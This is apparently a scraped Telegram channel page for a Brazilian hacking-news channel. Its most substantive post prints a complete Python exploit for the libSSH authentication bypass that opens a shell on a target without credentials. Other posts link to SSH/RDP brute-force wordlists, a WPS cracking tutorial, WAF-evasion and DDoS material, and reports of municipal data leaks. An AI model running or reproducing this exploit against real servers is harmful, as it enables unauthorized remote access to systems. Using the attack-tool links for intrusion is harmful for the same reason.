ar
Feedback
Ruby Of Security

Ruby Of Security

الذهاب إلى القناة على Telegram

Here you will find content like: 🌎 Notícias | 📡 Tecnologia | 🌐Hacking 📚 Cursos | ⚒Ferramentas | 📝Tutoriais @DARKNET_BR @TIdaDepressaoOficial @ExploitHub @AcervoDoSam Acervo:@AcervoRubyOfSec Group:@RubyOfSecGroup © Ruby Of Security - 2014 - 2019

إظهار المزيد
لم يتم تحديد البلدالفئة غير محددة
1 341
المشتركون
-124 ساعات
لا توجد بيانات7 أيام
+330 أيام
أرشيف المشاركات
libSSH Authentication Bypass libSSH suffers from an authentication bypass vulnerability. Bypass; #!/usr/bin/env python3 import paramiko import socket import argparse from sys import argv, exit parser = argparse.ArgumentParser(description="libSSH Authentication Bypass") parser.add_argument('--host', help='Host') parser.add_argument('-p', '--port', help='libSSH port', default=22) parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log") args = parser.parse_args() def BypasslibSSHwithoutcredentials(hostname, port): sock = socket.socket() try: sock.connect((str(hostname), int(port))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) spawncmd = transport.open_session() spawncmd.invoke_shell() return 0 except paramiko.SSHException as e: print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable") return 1 except socket.error: print("Unable to connect.") return 1 def main(): paramiko.util.log_to_file(args.logfile) try: hostname = args.host port = args.port except: parser.print_help() exit(1) BypasslibSSHwithoutcredentials(hostname, port) if name == 'main': exit(main()) fonte: https://exploit.kitploit.com/2018/10/libssh-authentication-bypass.html

Vazamento de Dados – Pardinho e PMMG – Lil_Sh4wtyy Nosso sistema de Monitoramento Avançado Persistente identificou, em 18/10, publicação no site de compartilhamento de texto Ghostbin contendo vazamento de dados do município de Pardinho/SP e publicação no Twitter com imagem de busca de vulnerabilidade na página da Polícia Militar de Minas Gerais (PM/MG). As ações foram realizadas pelo hacker brasileiro Lil_Sh4wtyy, integrante da equipe ElitePentesting. O vazamento do município de Pardinho/SP inclui nomes de tabelas da base de dados e credenciais de acesso (usuário/senha) em texto claro. 🌏@RubyOfSec https://www.defcon-lab.org/vazamento-de-dados-pardinho-e-pmmg-lil_sh4wtyy/

Pentest-Machine - Automates Some Pentest Jobs Via Nmap Xml File Automatiza algum trabalho pentesting através de um arquivo XML nmap. Assim que cada comando termina, grava sua saída no terminal e os arquivos em output-by-service / e output-by-host /. Executa comandos de retorno rápido primeiro. Por favor me envie protocolos / comandos / opções que você gostaria de ver incluídos. 🌏@RubyOfSec https://www.kitploit.com/2018/10/pentest-machine-automates-some-pentest.html

Escaneando vulnerabilidades com nmap Nmap é um dos Scanners de porta mais conhecidos no mundo hacker, por obter várias funções e a possibilidade de usar scripts NSE. https://rubyofsec.wordpress.com/2018/10/12/escaneando-vulnerabilidades-com-nmap/ 🌏@RubyOfSec

Identificando WAF/IDS/IPS Pelo Sqlmap A grande maioria de amadores na segurança da informação cometem o erro de sairem rodando quaisquer ferramentas sobre uma aplicação web, e isso pode comprometer sua integridade e anonimato além de trazer contratempos indesejáveis na fase de condução de um Pentest, por isso deve-se utilizar meios para identificar as proteções que o alvo possui. https://rubyofsec.wordpress.com/2018/10/10/identificando-waf-ids-ips-pelo-sqlmap/ 🌏@RubyOfSec

Vazamento de Dados – São João da Boa Vista – Purpl3Pand4 Nosso sistema de Monitoramento Avançado Persistente identificou, em 10/10, nova publicação nos site de compartilhamento de texto Pastebin.com contendo vazamento de dados do município de São João da Boa Vista/SP. A ação foi reivindicada pelo hacker brasileiro Purpl3Pan4. A motivação para o leak foi claramente político-ideológica, com explícita menção a #OpEleiçãoContraOFascismo convocada pelo AnonOpsBR. 🌏@RubyOfSec https://www.defcon-lab.org/vazamento-de-dados-sao-joao-da-boa-vista-purpl3pand4/

Wordlists (ssh, rdp, etc) Wordlists para realizar ataques de bruteforce em servicos como por exemplo: ssh, rdp, etc. https://github.com/jeanphorn/wordlist 🌏@RubyOfSec

Wireless Hacking.pdf2.00 MB

📚 #Ebook 🔖 Wireless Hacking 〰〰〰〰〰〰〰〰〰〰 @DARKNET_BR
📚 #Ebook 🔖 Wireless Hacking 〰〰〰〰〰〰〰〰〰〰 @DARKNET_BR

Invasão em rede WPS Como todos nós sabemos a rede WPA2 oferece um recurso que permite ao usuário se conectar a ela através de um PIN é aí que entra a vulnerabilidade, o Kali linux oferece uma infinidade de ferramentas dentre elas uma chamada Bully. 🌎@RubyOfSec https://rubyofsec.wordpress.com/2018/10/10/invasao-em-rede-wps/

Ferramentas Livres para Testes de Invasao @RubyOfSec

DoS - Denial of Service DDoS - Distributed Denial of Service DRDoS - Distributed Reflection Denial of Service 🌎@RubyOfSec http://www.inf.ufsc.br/~bosco.sobral/ensino/ine5630/material-seg-redes/Cap11-DDoS.pdf

AnonSurf - Rede Tor Anonimiza todo o sistema sob TOR usando IPtables. É muito fácil configurar e possivelmente menos complicações do que configurar uma VPN. É claro que você terá uma velocidade de conexão mais lenta que a VPN, já que está usando a rede TOR. O Anonsurf funciona em segundo plano (você pode fechar o terminal) e altera o endereço IP automaticamente a cada poucos minutos. 🌎@RubyOfSec https://github.com/ParrotSec/anonsurf